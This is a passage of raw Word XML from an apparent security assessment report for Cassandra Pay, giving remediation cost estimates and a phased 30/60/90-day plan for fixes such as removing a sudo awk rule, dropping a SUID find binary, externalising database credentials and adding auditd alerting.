              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>High Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E5CA0A6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628BB1C1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reading the matrix. The top-left quadrant — Quick Wins — contains items that close the highest-impact findings with the smallest implementation effort. Recommendations #1 and #3 sit there and account for the most-critical vulnerabilities on cassandra-stg-01. The top-right (Strategic Initiatives) contains items that close equally high-impact findings but require coordination with the vendor relationship. The bottom row deprioritises items whose impact is lower for Cassandra Pay's specific context — Argon2id migration is important but its impact materialises only when combined with another finding (F4), so it is properly second-wave work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242F34D2" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc229906614"/>
      <w:r>
        <w:t>7.2  Cost estimates per recommendation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="420A31DB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Costs below are stated in engineering hours and (where applicable) external dollar amounts. Cassandra Pay's internal blended labour rate for engineering staff is approximately USD 75/hour fully-loaded; this report does not multiply the hours by that figure because the budget cycle for Q3 2026 has not yet started and the rate may change. Confidence levels (Low / Medium / High) reflect how directly the estimate maps to the author's own experience with comparable work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C278909" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>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900"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="1226"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="77EC7CC6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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33C0D604" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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07DF36B1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Recommendation (short)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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1941D29C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Eng. effort (hours)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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0D3967E4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>External cost (USD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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6E5358A9" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Total est.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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0E7D4C80" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Confidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="013BDA26"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67BB390" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>1</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2A469EA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Remove sudo awk rule; deploy log-parse.sh wrapper.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87FFE3D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>2–4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714947E5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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357FEF3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>2–4 h labour</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1DC7331" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="2FB38B9E"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02C91E3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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8E59722" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Reject vendor VM; require LotusCMS removal or patch.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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1AE3F31B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>8–16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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35F2211C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>0–15,000 (re-tender)</w:t>
            </w:r>
          </w:p>
        </w:tc>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24ED01E5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>8–16 h + tender risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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336E760C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="7505A1F9"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5FFFD66" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>3</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8A8F318" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Drop /usr/local/bin/find SUID; nosuid mount on /tmp.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482ACAC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>2–6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4270ADD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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8D8ABF5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>2–6 h labour</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B49B085" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="6FBD86D1"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423CE7B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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1CB53CA5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Externalise DB creds (env vars or secret manager).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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6FE4586F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>12–24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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26219A01" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>0–5,000/yr (Vault)</w:t>
            </w:r>
          </w:p>
        </w:tc>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21DDF9E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>12–24 h + service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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F18A6A2" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="58556539"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4E9E467" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>5</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BEC3396" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Argon2id migration (vendor-side; coordinate with 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F83D81D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>40–80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006831D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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4E0BA51" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>40–80 h (vendor)</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C58738B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="5F00FCDD"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F1931B8" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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64953CE7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>auditd rules + SIEM alerting on setuid execve.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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C4E5AAF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>8–16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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4F9D392" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>0 (if SIEM in place)</w:t>
            </w:r>
          </w:p>
        </w:tc>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2F368CBD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>8–16 h labour</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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AC1FC82" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43F18ADE" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246945A9" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Assumptions stated explicitly. Recommendation #1 assumes the existing log-parsing automation can be wrapped in a 15-line bash script without architectural change. Recommendation #2 assumes the worst case in which Cassandra Pay must re-tender the vendor selection, which carries procurement-cycle cost we estimate at USD 10–15 000 conservatively; if the vendor accepts the LotusCMS removal requirement, this drops to zero. Recommendation #5 assumes the vendor performs the migration with our guidance, so engineering hours are vendor-side; if Cassandra Pay must staff the migration internally, multiply by 1.5x and re-rate confidence as Medium.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A22428" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc229906615"/>
      <w:r>
        <w:t>7.3  Phased rollout — 30 / 60 / 90 day plan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="68520279" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The schedule below distributes the six recommendations into three implementation windows. The schedule is intentionally asymmetric: the first window concentrates Quick Wins, the third absorbs vendor-coordination work, and the middle window holds items requiring coordination between two or more Cassandra Pay teams. Each window's table specifies a milestone (the event that signals completion) and a success metric (a measurable verification the recommendation has held).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D35C409" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc229906616"/>
      <w:r>
        <w:t>Window 1 — Days 0 to 30 (Quick Wins)</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
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="2526"/>
        <w:gridCol w:w="2200"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="6654B90E" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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02AE4C37" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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73AE7D45" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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0808AF1E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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5032BD48" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Milestone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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45945384" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Success metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="2BB0F3A3" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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B4C4093" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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17563639" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Remove sudo awk rule.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16AF4FB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>System Admin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F453DF0" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
